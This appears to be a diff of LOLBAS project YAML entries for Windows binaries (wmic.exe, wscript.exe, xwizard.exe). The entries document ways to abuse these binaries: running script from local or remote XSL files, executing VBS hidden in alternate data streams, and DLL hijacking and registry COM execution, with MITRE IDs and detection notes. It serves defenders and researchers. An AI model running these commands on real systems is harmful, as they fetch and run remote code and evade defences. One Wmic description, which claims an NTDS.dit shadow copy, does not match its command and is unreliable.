- Command: wmic.exe os get /format:"MYXSLFILE.xsl"
|
||||
Description: Executes JScript or VBScript embedded in the target XSL stylesheet.
|
||||
Usecase: Execute binary on remote system
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
|
||||
Description: Create a volume shadow copy of NTDS.dit that can be copied.
|
||||
Usecase: Execute binary on remote system
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
|
||||
Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet.
|
||||
|
||||
Usecase: Execute script from remote system
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- c:\windows\system32\wbem\wmic.exe
|
||||
- c:\windows\sysWOW64\wbem\wmic.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\wmic.exe
|
||||
- Path: C:\Windows\SysWOW64\wmic.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Wmic getting scripts from remote system
|
||||
Resources:
|
||||
- https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory
|
||||
- https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html
|
||||
- https://twitter.com/subTee/status/986234811944648707
|
||||
Notes: Thanks to Casey Smith - @subtee
|
||||
- Link: https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory
|
||||
- Link: https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html
|
||||
- Link: https://twitter.com/subTee/status/986234811944648707
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
@ -1,17 +1,27 @@
|
||||
---
|
||||
Name: Wscript.exe
|
||||
Description: Execute, Read ADS
|
||||
Author: ''
|
||||
Description: Used by Windows to execute scripts
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: wscript c:\ads\file.txt:script.vbs
|
||||
Description: Executes the .VBS script stored as an Alternate Data Stream (ADS).
|
||||
Description: Execute script stored in an alternate data stream
|
||||
Usecase: Execute hidden code to evade defensive counter measures
|
||||
Category: Alternate data streams
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- c:\windows\system32\wscript.exe
|
||||
- c:\windows\sysWOW64\wscript.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\wscript.exe
|
||||
- Path: C:\Windows\SysWOW64\wscript.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Wscript.exe executing code from alternate data streams
|
||||
Resources:
|
||||
- '?'
|
||||
Notes: Thanks to ?
|
||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
@ -1,21 +1,29 @@
|
||||
---
|
||||
Name: Xwizard.exe
|
||||
Description: DLL hijack, Execute
|
||||
Author: ''
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: xwizard.exe
|
||||
Description: Xwizard.exe will load a .DLL file located in the same directory (DLL Hijack) named xwizards.dll.
|
||||
- Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
|
||||
Description: Xwizard.exe running a custom class that has been added to the registry.
|
||||
Usecase: Run a com object created in registry to evade defensive counter measures
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- c:\windows\system32\xwizard.exe
|
||||
- c:\windows\sysWOW32\xwizard.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\xwizard.exe
|
||||
- Path: C:\Windows\SysWOW64\xwizard.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
Resources:
|
||||
- http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
|
||||
- https://www.youtube.com/watch?v=LwDHX7DVHWU
|
||||
- https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
|
||||
Notes: Thanks to Adam - @Hexacorn, Nick Tyrer - @nicktyrer
|
||||
- Link: http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
|
||||
- Link: https://www.youtube.com/watch?v=LwDHX7DVHWU
|
||||
- Link: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
|
||||
Acknowledgement:
|
||||
- Person: Adam
|
||||
Handle: '@Hexacorn'
|
||||
---
|
Loading…
Reference in New Issue
Block a user